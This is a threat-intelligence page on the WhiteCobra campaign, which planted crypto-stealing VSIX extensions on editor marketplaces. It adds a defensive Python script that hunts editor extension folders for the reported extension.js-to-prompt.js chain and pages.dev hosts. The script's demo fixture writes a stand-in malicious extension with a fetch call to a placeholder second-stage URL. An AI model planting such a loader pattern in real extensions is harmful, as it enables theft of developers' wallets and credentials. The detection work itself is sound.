WhiteCobra malicious VSIX extension campaign
Campaign
Summary
WhiteCobra is running an ongoing malicious extension campaign that plants crypto-stealing VSIX extensions in major editor marketplaces, putting VSCode, Cursor, and Windsurf users at risk. The operation abuses the Visual Studio marketplace and Open VSX registry to reach victims at scale. On Windows, the chain can launch LummaStealer to harvest wallet data and browser credentials. The group keeps replacing removed listings, showing fast operational resilience and continued exposure for users.
Related Happenings
GlassWorm OpenVSX sleeper extension campaign
Campaign
First: 28.04.2026 00:41
Last: 28.04.2026 00:41
Sources 1
About this happening:
The **GlassWorm** operation has launched a **new wave** against **OpenVSX**, seeding **73 sleeper extensions** that become malicious after an **update** and can deliver malware to...
GlassWorm v2 cloned VS Code extension loaders
Malware Activity
First: 27.04.2026 14:23
Last: 27.04.2026 14:23
Sources 1
About this happening:
The **GlassWorm v2** malware activity now uses **cloned VS Code extensions** on **Open VSX** to deliver payloads that steal credentials, deploy a **RAT**, and spread across multip...
GlassWorm Zig dropper infecting developer IDEs
Malware Activity
First: 10.04.2026 16:23
Last: 10.04.2026 16:23
Sources 1
About this happening:
The **GlassWorm** malware set now uses a **Zig dropper** that can silently infect **all VS Code-based IDEs** on a developer's machine, widening the reach of the compromise. The pa...
Venom Stealer MaaS continuous credential theft and exfiltration
Malware Activity
First: 01.04.2026 16:30
Last: 01.04.2026 16:30
Sources 1
About this happening:
The **Venom Stealer** **malware-as-a-service** platform has been identified as a **credential-theft** threat that keeps exfiltrating data after infection, extending the window for...
GlassWorm multi-stage data-theft malware evolution
Malware Activity
First: 25.03.2026 16:26
Last: 25.03.2026 16:26
Sources 1
About this happening:
The **GlassWorm** malware family has evolved into a **multi-stage** payload chain that steals browser data and crypto-wallet information, increasing risk for **Windows** and **mac...
Timeline
- 13.09.2025 17:00 · 2 articles
WhiteCobra malicious extension campaign targets VSCode, Cursor, and Windsurf users
Initial Disclosure: WhiteCobra targets VSCode, Cursor, and Windsurf users by planting 24 malicious VSIX extensions in the Visual Studio marketplace and the Open VSX registry, using lookalike Solidity and crypto-development listings with inflated download counts and professionally styled descriptions. Koi Security says each extension's entry point is extension.js, which hands off to prompt.js; prompt.js fetches a second-stage payload from Cloudflare Pages, and on Windows the chain can launch LummaStealer to steal cryptocurrency wallet data, browser credentials, and messaging app data. Core Ethereum developer Zak Cole said his wallet was drained after he installed contractshark.solidity-lang in Cursor.
- 'WhiteCobra' floods VSCode market with crypto-stealing extensions — www.bleepingcomputer.com — 13.09.2025 17:00
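A local hunt for the chain described in this entry, added here as an illustration; it is not code from Koi Security, BleepingComputer, or any of the editor vendors. It walks the unpacked extension directories of VS Code, Cursor and Windsurf (the default paths are assumed and differ by platform and install type), flags the one extension ID the page names, and flags any extension whose entry script loads a sibling prompt.js or whose JavaScript references a *.pages.dev host. The regexes are my approximation of the reported behaviour rather than published indicators, and the two fixture extensions (including the example-stage2.pages.dev URL) are constructed for the demo.

```python
"""Hunt for WhiteCobra-style VSIX extensions in VS Code-family editor installs."""
import json
import re
import tempfile
from pathlib import Path
from typing import Optional

# Assumed default unpacked-extension directories for VS Code, Cursor and Windsurf.
EDITOR_EXT_DIRS = [
    Path.home() / ".vscode" / "extensions",
    Path.home() / ".cursor" / "extensions",
    Path.home() / ".windsurf" / "extensions",
]

# The only extension ID named in the report; extend this from your own intel feed.
KNOWN_BAD_IDS = {"contractshark.solidity-lang"}

# Heuristics approximating the reported chain (extension.js -> prompt.js -> fetch
# from Cloudflare Pages). These are my own patterns, not vendor-published IOCs.
PROMPT_JS_RE = re.compile(r"""require\(\s*['"]\./prompt(?:\.js)?['"]\s*\)""")
PAGES_DEV_RE = re.compile(r"https?://[A-Za-z0-9.-]+\.pages\.dev")


def extension_id(pkg: dict) -> str:
    """Marketplace-style '<publisher>.<name>' identifier, lower-cased."""
    return f"{pkg.get('publisher', '')}.{pkg.get('name', '')}".lower()


def scan_extension(ext_dir: Path) -> Optional[dict]:
    """Return a finding for one unpacked extension, or None if nothing is flagged."""
    pkg_path = ext_dir / "package.json"
    if not pkg_path.is_file():
        return None
    try:
        pkg = json.loads(pkg_path.read_text(encoding="utf-8", errors="replace"))
    except json.JSONDecodeError:
        return None
    ext_id = extension_id(pkg)
    reasons = []
    if ext_id in KNOWN_BAD_IDS:
        reasons.append("known-bad extension id")
    # VS Code falls back to ./extension.js when package.json has no "main".
    main = pkg.get("main") or "./extension.js"
    main_path = ext_dir / main
    if main_path.is_file():
        src = main_path.read_text(encoding="utf-8", errors="replace")
        if PROMPT_JS_RE.search(src):
            reasons.append(f"{main} loads sibling prompt.js")
    # Any script in the package that names a Cloudflare Pages host is suspicious.
    for js in sorted(ext_dir.rglob("*.js")):
        if "node_modules" in js.parts:
            continue
        src = js.read_text(encoding="utf-8", errors="replace")
        for host in PAGES_DEV_RE.findall(src):
            reasons.append(f"{js.relative_to(ext_dir)} references {host}")
    if not reasons:
        return None
    return {"id": ext_id, "path": str(ext_dir), "reasons": reasons}


def scan_dirs(dirs) -> list:
    """Scan every extension folder under each root that exists."""
    findings = []
    for root in dirs:
        if not root.is_dir():
            continue
        for ext_dir in sorted(p for p in root.iterdir() if p.is_dir()):
            finding = scan_extension(ext_dir)
            if finding:
                findings.append(finding)
    return findings


def build_demo_tree() -> Path:
    """Constructed fixture: one benign extension and one mimicking the reported chain."""
    root = Path(tempfile.mkdtemp(prefix="ext-scan-"))
    bad = root / "contractshark.solidity-lang-1.0.0"
    bad.mkdir()
    (bad / "package.json").write_text(json.dumps(
        {"publisher": "contractshark", "name": "solidity-lang", "main": "./extension.js"}))
    (bad / "extension.js").write_text("exports.activate = () => require('./prompt.js');\n")
    # Constructed second-stage URL for the demo; not a real indicator.
    (bad / "prompt.js").write_text("fetch('https://example-stage2.pages.dev/payload');\n")
    good = root / "example.hello-world-0.0.1"
    (good / "out").mkdir(parents=True)
    (good / "package.json").write_text(json.dumps(
        {"publisher": "example", "name": "hello-world", "main": "./out/main.js"}))
    (good / "out" / "main.js").write_text("exports.activate = () => {};\n")
    return root


if __name__ == "__main__":
    for f in scan_dirs(EDITOR_EXT_DIRS + [build_demo_tree()]):
        print(f["id"], f["path"], *f["reasons"], sep="\n  ")
```

Run it as-is to scan the three editors plus the fixture; on a real host, treat a prompt.js hand-off or a pages.dev reference as a lead to inspect, not proof of compromise, since legitimate extensions can fetch from Cloudflare Pages too.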